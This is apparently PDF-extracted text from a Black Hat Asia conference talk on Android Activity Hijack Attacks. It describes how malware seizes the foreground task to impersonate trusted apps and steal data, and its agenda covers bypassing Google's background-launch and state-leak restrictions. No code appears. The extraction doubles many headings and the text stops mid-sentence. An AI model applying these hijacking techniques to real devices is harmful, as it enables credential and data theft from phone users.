Asia-24-WeiMinCheng-systemui-as-evilpip-the-hijacking-attacks-on-modern-mobile-devices.pdf

1、#BHASIA BlackHatEventsS SystemUIystemUI As As EvilPiPEvilPiPWeiMin Cheng()The Hijacking Attacks on Modern Mobile Device#BHASIA BlackHatEventsWhoAreWeWhoAreWeWeiMin ChengQI-ANXINGithub:MG1937Twitter:MGAldys4Yue LiuQI-ANXINGithub:lieanuMobile&AOSPBinary Researcher#BHASIA BlackHatEventsAgendaAgenda Wha

2、t is Activity Hijack Attack(AHA)Restrictions and Policies released by Google Bypass Security Policies Video Demo for Fullchain BAL Restriction Runtime State Leak Strictly LMKD#BHASIA BlackHatEventsWhat is AHAWhat is AHA Activity Hijack Attack(AHA)almost zero cost and easy to exploit Hijack target ap

3、p for stealing sensitive data or runtime privilege Adware,BankBot,Ransomware,Rat#BHASIA BlackHatEventsHow AHA WorkHow AHA Work Take Android4.0 as an example Case of Simplocker,malware for Android4.0 Essence is abuse NEW_TASK FLAG to seize FG TaskCode snippet of Simplocker#BHASIA BlackHatEventsHow AH

4、A WorkHow AHA Work Malicouse Activity enter FG Task Previous Task pushed to BG Task Now Malware can forge the trusted App,StrandHogg-like Hijack schemeWhy have to seize FG Task for hijack?#BHASIA BlackHatEventsTask And BackTask And Back-StackStack Task Stack is a collection of activities User can on

5、ly interact with ONE Front Task(in most case)#BHASIA BlackHatEventsClassic Attack SchemeClassic Attack Scheme#BHASIA BlackHatEventsClassic Attack SchemeClassic Attack SchemeLow cost,high returnAlmost affects all App in Old Device#BHASIA BlackHatEventsKey Factors OF AHAKey Factors OF AHA Background A

6、ctivity Launch(BAL)Target Running State Detect Background Persistent Processaaass#BHASIA BlackHatEventsGoogle will not allow this happenGoogle will not allow this happen#BHASIA BlackHatEventsRestriction 0 x1 No Leak StateRestriction 0 x1 No Leak State getRunningTasks|getRunningAppProcesses requires